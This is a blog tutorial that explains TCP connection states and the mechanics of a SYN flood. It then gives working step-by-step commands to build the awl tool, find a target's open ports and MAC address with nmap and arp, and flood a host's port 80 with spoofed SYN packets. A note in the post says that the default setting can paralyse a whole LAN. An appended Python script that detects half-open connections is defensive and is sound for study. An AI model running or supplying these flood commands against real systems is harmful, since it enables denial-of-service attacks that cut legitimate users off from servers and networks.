I. TCP connection state diagram
[Figure 3.png: TCP connection state diagram]
The description is as follows:
Server side: LISTEN: waiting for a connection request from any remote TCP port
Client: SYN-SENT: waiting for a matching connection request after having sent a connection request
Server side: SYN-RECEIVED: waiting for confirmation of the connection request after having both received and sent a connection request
Client/server side: ESTABLISHED: an open connection
Client: FIN-WAIT-1: waiting for a connection termination request from the remote TCP, or for an acknowledgement of the termination request previously sent
Server side: CLOSE-WAIT: waiting for a connection termination request from the local user
Client: FIN-WAIT-2: waiting for a connection termination request from the remote TCP
Server side: LAST-ACK: waiting for an acknowledgement of the connection termination request previously sent to the remote TCP
Client: TIME-WAIT: waiting long enough to be sure the remote TCP received the acknowledgement of its connection termination request
Server side: CLOSED: no connection state at all
II. The process of a SYN flood attack
After the server returns a SYN-ACK packet, if the originating address belongs to a non-existent client, the server never receives the client's ACK. The server then keeps a certain amount of system memory tied up waiting for this half-open connection until the wait times out and the entry is released. Using IP spoofing, a malicious party sends a large number of SYN packets to the victim system, creating a large number of half-open connections on the server and consuming large amounts of memory and TCP connection slots, so that legitimate clients can no longer reach the server.
III. Using awl to carry out a SYN flood attack against a server
1. Official website: https://gitlab.com/davical-project/awl/tags
2. Download, extract and install
tar -zxvf awl-0.2.tar.gz
./configure --prefix=/usr/local/awl
make -j 4
make install
3. awl command format
awl -i eth0 -m 00:0c:29:a9:f0:6c -d ip -p port
Description:
-i: the interface to send packets from; defaults to eth0 if omitted
-m: the MAC address of the attacked machine. The program cannot derive the MAC from the target IP, so it must be specified manually: ping the target IP first, then run arp -a. If omitted it defaults to FF:FF:FF:FF:FF:FF, meaning the SYN packets are broadcast to every host on the same network segment, which can easily paralyze the entire LAN.
-d: the IP of the attacked machine
-p: the port of the attacked machine
4. Use nmap to view the target machine's open ports and MAC
nmap 192.168.1.123
or: ping 192.168.1.123; arp -n to view the MAC
[Screenshot 4.4.png]
5. Testing
/usr/local/awl/bin/awl -i eth0 -m 00:0c:29:a9:f0:6c -d 192.168.1.123 -p 80
[Screenshot 4.5.png]
netstat -antup | grep 80
[Screenshot 4.51.png]
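The netstat check above only eyeballs the output. As an added example (not part of the original post), the following script parses netstat -antup output and counts half-open connections per local port, which is the server-side SYN-RECEIVED condition described in section II; the sample output, the port-80 target and the threshold of 3 are constructed for illustration.

```python
from collections import Counter, defaultdict

# Constructed sample of `netstat -antup` output (not captured from the page):
# several half-open (SYN_RECV) connections on port 80 from a few sources,
# plus listening, established and UDP rows that must not be counted.
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1234/nginx
tcp        0      0 192.168.1.123:80        10.9.8.7:40001          SYN_RECV    -
tcp        0      0 192.168.1.123:80        10.9.8.7:40002          SYN_RECV    -
tcp        0      0 192.168.1.123:80        172.16.5.5:51000        SYN_RECV    -
tcp        0      0 192.168.1.123:80        203.0.113.9:33333       SYN_RECV    -
tcp        0      0 192.168.1.123:80        192.168.1.50:52000      ESTABLISHED 1234/nginx
tcp        0      0 192.168.1.123:22        192.168.1.50:52001      ESTABLISHED 999/sshd
udp        0      0 0.0.0.0:68              0.0.0.0:*                           555/dhclient
"""

def half_open_by_port(netstat_text):
    """Return {local_port: (syn_recv_count, distinct_remote_ips)} from netstat -ant(up) text.

    Only tcp/tcp6 rows in SYN_RECV are counted; LISTEN and ESTABLISHED rows
    and UDP rows (which carry no State column) are skipped.
    """
    counts = Counter()
    remotes = defaultdict(set)
    for line in netstat_text.splitlines():
        fields = line.split()
        # A TCP row has at least proto, recv-q, send-q, local, foreign, state.
        if len(fields) < 6 or not fields[0].startswith("tcp"):
            continue
        local, foreign, state = fields[3], fields[4], fields[5]
        if state != "SYN_RECV":
            continue
        port = local.rsplit(":", 1)[1]          # rsplit also handles IPv6 "::1:80"
        counts[port] += 1
        remotes[port].add(foreign.rsplit(":", 1)[0])
    return {p: (counts[p], len(remotes[p])) for p in counts}

def flag_syn_flood(netstat_text, threshold=3):
    """Local ports whose half-open count reaches the (constructed) threshold, sorted."""
    return sorted(p for p, (n, _) in half_open_by_port(netstat_text).items() if n >= threshold)

if __name__ == "__main__":
    for port, (n, srcs) in half_open_by_port(SAMPLE_NETSTAT).items():
        print(f"port {port}: {n} half-open connections from {srcs} source IPs")
    print("suspect ports:", flag_syn_flood(SAMPLE_NETSTAT))
```

A real threshold depends on the host's normal backlog; many distinct source addresses stuck in SYN_RECV on one port is the signature of the spoofed-SYN condition, and on Linux SYN cookies (net.ipv4.tcp_syncookies) are the standard mitigation for it.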
This article is from the "A horse on the Plains" blog; please be sure to keep this source: http://huangzp.blog.51cto.com/12434999/1908170
AWL multi-process SYN attack